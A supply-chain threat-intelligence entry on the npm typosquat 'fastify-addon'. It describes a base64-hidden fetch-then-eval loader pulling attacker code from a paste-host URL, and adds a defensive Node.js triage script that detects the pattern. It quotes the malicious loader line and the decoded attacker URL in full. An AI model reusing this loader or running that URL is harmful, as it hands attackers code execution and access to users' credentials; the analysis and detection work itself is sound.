Supply-chain threat intelligence
Risk score
92
Indexed incident for fastify-addon (npm).
fastify-addon is a typosquat of the legitimate fastify-plugin package. Its package.json sets repository, bugs, and homepage to github.com/fastify/fastify-plugin, the upstream project it impersonates and has no connection to, and its README reproduces fastify-plugin's API documentation so that the package looks genuine to anyone installing it. On require, lib/getPluginName.js (loaded transitively from the package main, plugin.js) runs a top-level statement that fetches a base64-obscured URL, https://www.jsonkeeper.com/b/UBMJA (decoded from atob('aHR0cHM6Ly93d3cuanNvbmtlZXBlci5jb20vYi9VQk1KQQ==')), parses the response as JSON, and passes its content field straight to eval: fetch(atob(...)).then(r=>r.json()).then(d=>{eval(d.content)}). The destination is a mutable third-party JSON paste host, so the executed payload is attacker-controlled and can change at any time; a benign or empty payload observed at scan time says nothing about what a later install will run. Any process that requires fastify-addon executes whatever JavaScript the attacker currently hosts at that URL, with the requiring process's full access to the consumer's environment variables, credentials, and filesystem.
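The following is an added example, not code from fastify-addon, fastify-plugin, or the indexing service: a small static pre-install triage in Node.js that looks for the loader pattern described above. It decodes base64 literals passed to atob(), flags eval() calls whose argument is not a string literal, flags lines that chain a network call into a code sink, and cross-checks the package name against the GitHub repository its metadata claims. The source file and package.json it runs on are constructed here to mirror the described lib/getPluginName.js and metadata; only the atob() literal and its decoded URL are taken from the incident text. The field names and verdict labels are this example's own choices.

```javascript
// Added example (not code from fastify-addon or fastify-plugin): static
// pre-install triage for the fetch-then-eval loader pattern and the borrowed
// repository metadata described above. Run with: node triage.js

const REPO_FIELDS = ['repository', 'bugs', 'homepage'];

// Constructed sample mirroring the described lib/getPluginName.js. The atob()
// literal is the one quoted in the incident text; the exported function is a
// placeholder so the file reads like a plausible helper module.
const SAMPLE_SOURCE = [
  "'use strict'",
  "fetch(atob('aHR0cHM6Ly93d3cuanNvbmtlZXBlci5jb20vYi9VQk1KQQ==')).then(r=>r.json()).then(d=>{eval(d.content)})",
  'module.exports = function getPluginName (fn) { return fn.name }',
].join('\n');

// Constructed package.json mirroring the metadata mismatch described above.
const SAMPLE_PACKAGE_JSON = {
  name: 'fastify-addon',
  main: 'plugin.js',
  repository: { type: 'git', url: 'git+https://github.com/fastify/fastify-plugin.git' },
  bugs: { url: 'https://github.com/fastify/fastify-plugin/issues' },
  homepage: 'https://github.com/fastify/fastify-plugin#readme',
};

// Decode every base64 string literal handed to atob() and return the results.
function decodeAtobLiterals(source) {
  const re = /\batob\s*\(\s*(['"`])([A-Za-z0-9+/=\s]+)\1\s*\)/g;
  const out = [];
  for (const m of source.matchAll(re)) {
    out.push(Buffer.from(m[2].replace(/\s+/g, ''), 'base64').toString('utf8'));
  }
  return out;
}

// eval()/new Function() calls whose argument is not a string literal, i.e.
// code the package does not ship with itself.
function findDynamicEvalSinks(source) {
  const findings = [];
  source.split('\n').forEach((line, i) => {
    const evalCall = /\beval\s*\(\s*([^)]*)\)/.exec(line);
    if (evalCall && !/^\s*['"`]/.test(evalCall[1])) {
      findings.push({ line: i + 1, sink: 'eval', arg: evalCall[1].trim() });
    }
    if (/\bnew\s+Function\s*\(/.test(line)) {
      findings.push({ line: i + 1, sink: 'new Function', arg: null });
    }
  });
  return findings;
}

// Line numbers where a network call and a code sink appear in one statement.
function findRemoteToEval(source) {
  return source.split('\n')
    .map((text, i) => ({ line: i + 1, text }))
    .filter(({ text }) => /\b(fetch|https?\.get|https?\.request)\s*\(/.test(text)
      && /\b(eval|Function)\s*\(/.test(text))
    .map(({ line }) => line);
}

// "owner/repo" from a repository/bugs/homepage value, or null if not GitHub.
function githubRepoFromField(value) {
  const s = typeof value === 'string' ? value : value && value.url;
  const m = s && /github\.com[/:]([^/#]+)\/([^/#.]+?)(?:\.git)?(?:[/#]|$)/.exec(s);
  return m ? `${m[1]}/${m[2]}` : null;
}

// Metadata pointing at a repository whose name differs from the package name:
// typosquats commonly borrow the impersonated project's links.
function findMetadataMismatch(pkg) {
  const mismatches = [];
  for (const field of REPO_FIELDS) {
    const repo = githubRepoFromField(pkg[field]);
    if (repo && repo.split('/')[1] !== pkg.name) mismatches.push({ field, repo });
  }
  return mismatches;
}

// sources: { relativePath: fileContents }. Returns a structured report with a
// verdict of 'ok', 'review', or 'block'.
function triagePackage(pkg, sources) {
  const report = {
    name: pkg.name, decodedUrls: [], evalSinks: [], remoteToEval: [],
    metadataMismatch: findMetadataMismatch(pkg), verdict: 'ok',
  };
  for (const [file, src] of Object.entries(sources)) {
    report.decodedUrls.push(...decodeAtobLiterals(src)
      .filter((s) => /^https?:\/\//.test(s)).map((url) => ({ file, url })));
    report.evalSinks.push(...findDynamicEvalSinks(src).map((f) => ({ file, ...f })));
    report.remoteToEval.push(...findRemoteToEval(src).map((line) => ({ file, line })));
  }
  if (report.remoteToEval.length || (report.decodedUrls.length && report.evalSinks.length)) {
    report.verdict = 'block';
  } else if (report.evalSinks.length || report.metadataMismatch.length) {
    report.verdict = 'review';
  }
  return report;
}

if (typeof require !== 'undefined' && require.main === module) {
  const report = triagePackage(SAMPLE_PACKAGE_JSON, { 'lib/getPluginName.js': SAMPLE_SOURCE });
  console.log(JSON.stringify(report, null, 2));
}
```

The check is deliberately conservative: a hidden URL alone, or a dynamic eval alone, only raises the package for review, while the two together on one line (the pattern in this incident) blocks it. Because the hosted payload can change between scans, the decision is based on the loader in the tarball, not on whatever the paste host happens to return when fetched.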
Affected versions
Indicators
Timeline